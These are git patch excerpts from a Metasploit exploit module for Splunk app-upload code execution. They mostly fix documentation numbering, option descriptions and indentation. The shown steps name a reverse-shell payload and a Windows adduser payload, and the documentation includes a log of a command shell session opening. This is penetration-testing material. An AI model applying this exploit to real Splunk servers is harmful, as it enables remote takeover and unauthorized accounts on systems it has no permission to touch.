splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b73714c5f0f5..bb9dbc57fe0c 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -21,7 +21,8 @@ This module has been tested successfully against: 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + 8. Set a payload: + * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target) From 985f3748e54b8a4607be8c0f0904c359aa3d33c0 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 15:08:51 +0100 Subject: [PATCH 36/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 3ca94d1b4c25..64ed0ff6ecd0 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -430,7 +430,8 @@ def do_upload_app_7(app_name, file_name) end print_good("#{app_name} successfully uploaded") - + end + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( From 418581d4d3fe28b7d9240a8a5dbb8689beb88b19 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:06 +0100 Subject: [PATCH 37/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 1 - 1 file changed, 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index bb9dbc57fe0c..51aad771ce43 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,6 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. Set a payload: * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From ed52ac685ddd700484700404bd7d73c86d39d0b1 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:18 +0100 Subject: [PATCH 38/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 51aad771ce43..2a6595e97e2a 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,7 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. Set a payload: + 6. Set a payload: * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From 91d4c00c371f0397e3076661883d91273f6b7b21 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:30 +0100 Subject: [PATCH 39/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2a6595e97e2a..a538752ad713 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -39,7 +39,7 @@ This module has been tested successfully against: Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` - **USERNAME** + **USERNAME** Default is `admin` **PASSWORD** From fe0adb9ca1656e0c5577242cbb12e614a1d13c15 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 15:11:43 +0100 Subject: [PATCH 40/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a538752ad713..63ee18b08b96 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -40,7 +40,7 @@ This module has been tested successfully against: Default is `false` **USERNAME** - Default is `admin` + Username for Splunk. Default is `admin` **PASSWORD** Default is `changeme` From a2d6c77fb83a680bae6c36206ea2a4fde1a278fb Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 15:28:24 +0100 Subject: [PATCH 41/42] indentation fixes --- .../multi/http/splunk_upload_app_exec.rb | 29 ++++++++++--------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 64ed0ff6ecd0..7718ddba875b 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -430,8 +430,9 @@ def do_upload_app_7(app_name, file_name) end print_good("#{app_name} successfully uploaded") + end - + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( @@ -457,19 +458,19 @@ def do_get_csrf(uri) # version 7.2.x only def do_get_state_token(uri) - print_status("Fetching state token from #{uri}") - res = send_request_cgi( - 'uri' => uri, - 'method' => 'GET', - 'cookie' => @auth_cookies - ) - #puts res - res.body.match('name=\"state\" value="(.*)"') # Version 5 - @state_token = Regexp.last_match(1) - - unless @state_token - fail_with(Failure::Unknown, "state token form Key not found") - end + print_status("Fetching state token from #{uri}") + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET', + 'cookie' => @auth_cookies + ) + #puts res + res.body.match('name=\"state\" value="(.*)"') # Version 5 + @state_token = Regexp.last_match(1) + + unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") + end end def fetch_job_output(job_id) From 6b0f7fd9f1939eae3465a9346a2356548e0b8673 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 22:44:07 +0100 Subject: [PATCH 42/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 63ee18b08b96..1801c0168f57 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -93,7 +93,7 @@ msf5 exploit(multi/http/splunk_upload_app_exec) > exploit [*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 ``` -### Tested against 7.2.4 splunk-5.0.1-143156 on Ubuntu 10.04 +### Tested against splunk-5.0.1-143156 on Ubuntu 10.04 ``` msf > use exploit/multi/http/splunk_upload_app_exec